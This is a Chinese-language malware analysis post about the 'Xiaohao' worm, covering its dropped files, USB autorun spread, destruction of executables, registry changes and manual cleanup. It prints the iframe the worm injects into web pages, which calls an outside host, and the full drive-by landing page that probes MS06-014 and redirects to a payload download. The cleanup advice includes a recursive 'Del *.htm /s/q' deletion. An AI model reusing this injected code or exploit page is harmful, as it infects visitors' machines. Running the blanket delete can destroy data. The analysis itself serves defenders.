警惕‘浩’字病毒`

文件名称：Xiaohao.exe

文件大小：12288 bytes

AV命名：Virus.Win32.Agent.o（瑞星）

加壳方式：UPX 0.89.6 - 1.02 / 1.05 - 1.24

编写语言：Microsoft Visual C++ 6.0

病毒类型：蠕虫

文件MD5：B50ED06B61CDCF060D0136784999E50C

文件SHA1：ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD

传播方式：U盘等移动介质、网页漏洞。

 

1、释放病毒文件：

 

%Systemroot%\system32\dllcache\dvdplay.exe

%Systemroot%\system32\OLDA.tmp

%Systemroot%\system32\exloroe.exe

其中主体Xiaohao.exe常驻进程。

 

2、尝试启动C:\Program Files\Internet Explorer\iexplore.exe，不过未见其他行为。

 

3、Xiaohao.exe查找可用的磁盘，在其目录下生成：Xiaohao.exe和Autorun.inf

 

如双击磁盘，则激活病毒。

 

（如果在插入U盘情况下，运行被感染的病毒，那么U盘目录会生成Xiaohao.exe和Autorun.inf）

 

4、遍历磁盘所有文件，如遇到.exe文件则覆盖，并在文件尾增加感染标记“ygr”

 

覆盖文件头部，导致可执行文件结构被破坏。 文件全部变成一个“浩”字。

 

由于无判断，系统文件也被破坏了，重启后可能无法开机。

 

并且一些系统设置和配置失效，例如系统时间会被修改。

 

5、查找扩展名为*.jsp、*.php、*.aspx、*.asp、*.html、*.htm文件。插入一段代码：

 

<ifrae src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0></ifram>

 

代码：

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>IE 0Day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
function detectOS()
{
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
{
OS = "Windows XP";
}
else
{
if(navigator.userAgent.indexOf("Windows NT 5.2") != -1)
{OS = "Windows 2003";}
else
{OS = "Windows 2000";}
}
return OS;
}
function MakeItSo()
{
if(detectOS() == "Windows XP")
{
//2YWwO5M3N*xp,V4PPxp5DMS07-004MxBm
window.location.href="baobao.htm";
}
else {if(detectOS() == "Windows 2003")
{
//2YWwO5M3N*2003
window.location.href="zhu3.htm";
}
else
{
//2YWwO5M3N*2K,V4PP2K5DMS07-004MxBm
window.location.href="banner.htm";
}
}
}
</SCRIPT>

<SCRIPT language=VBScript>
on error resume next
Set downf = document.createElement("object")
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"
str="Microsoft.XMLHTTP"
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
err.clear
//C;SPMS06-014B)64,5Ck:sEP6O2YWwO5M3@`PMV4PP2;M,5DMS07-004MxBm
document.write("<scr"&"ipt language=""javascript"">window.setTimeout(""MakeItSo()"",5000);</sc"&"ript>")
else
//SPMS06-014B)64,V4PP06-0145DMxBmad.htm
document.write("<iframe width=""0"" height=""0"" src=""zhu3.htm""></iframe>")
end if
</SCRIPT>
<script src=yun.js></script>
<SCRIPT language=javascript type=text/javascript>
var cookieString = document.cookie;
var start = cookieString.indexOf("woshi0day=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();
document.write("<iframe width=0 height=0 src=baobao.htm></iframe>");
}</SCRIPT>
</BODY></HTML>

 

由操作系统版本判断，决定跳转的网页。

 

首先检测是否存在MS06-014漏洞，若有，则跳至h**p://xiaohao.yona.biz/zhu3.htm

 

如无意外，可获样本：h**p://xiaohao.yona.biz/xiaohao.exe （就是那个主角拉``）

 

若无MS06-014漏洞，则跳至h**p://xiaohao.yona.biz/baobao.htm.

 

代码以十进制加密```解密后得一只0day，应该是ANI的马``=。=

 

连接已失效``（晕）

 

时间关系，不深入分析咧```=。=

 

6、修改注册表（不记得哪里，哈哈``），删除开始菜单的快捷方式。

 

7、修改进程窗口标题，为：已中毒 X14o-H4o's Virus

 

8、如病毒在进程，在进入一个目录后，所有文件（被感染文件除外）属性皆被设置为隐藏！

 

9、破坏显示隐藏文件，设置为“不显示”。

 

10、写入注册表，开机自启：

 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\

 

指向%SystemRoot%\system32\exloroe.exe

 

（汗，这一步绝对多余了，因为系统根本启动不了！）

 

11、保存被感染的文件列表，则C:\Jilu.txt

 

狂汗``有1M多！

 

 

没有解决方法哈```重启后系统不能启动，呵呵

 

只能重装``

 

1、C盘格掉，重装系统后，删除每个磁盘下的Xiaohao.exe和Autorun.inf。

 

记住，不要双击进入啊，不然一切又白费了，建议用Winrar或CMD下删除。

 

2、不要运行C盘外的任何程序，直接网上下载杀毒软件，升级之``全盘扫

 

3、还有那些被插代码的网页文件。。

 

由于是重装，系统补丁没打``如果不小心运行，可能病毒又来了`` T  T

 

可以下载个批量删除代码的工具哈``杀软也应该可以吧？

 

或者干脆：

 

Del *.htm /s/q

 

*.htm自己换成其他网页格式文件哈。

 

===========================================

也可以在DOS下用光盘杀毒啊，前提是杀软能识别。

===========================================

 

PS：

这种病毒破坏性非常大，建议打齐系统补丁，及时升级杀软！！

 

杀软如有主动防御功能更好``没有的话，去下个HIPS辅助``

 

还有```不明的网站就不要进拉~~